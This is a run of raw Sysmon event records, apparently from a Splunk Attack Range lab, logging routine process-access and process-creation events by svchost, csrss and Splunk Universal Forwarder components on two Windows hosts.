08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.371{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:26.355{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F92E-60EB-FC79-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.355{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92E-60EB-FC79-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:26.356{0C1E0330-F92E-60EB-FC79-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000811130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.918{0C1E0330-F92F-60EB-FE79-00000000D001}33283348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:27.037{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A3D02528341A82434C3E87EC2A795FD,SHA256=6591E4F3E7D2488F27490EA35E19366A7DDA76622793D5B1CB8D729AFAE55CAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.762{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92F-60EB-FE79-00000000D001}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.746{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F92F-60EB-FE79-00000000D001}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92F-60EB-FE79-00000000D001}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.731{0C1E0330-F92F-60EB-FE79-00000000D001}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000811116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.215{0C1E0330-F92F-60EB-FD79-00000000D001}2612504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92F-60EB-FD79-00000000D001}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 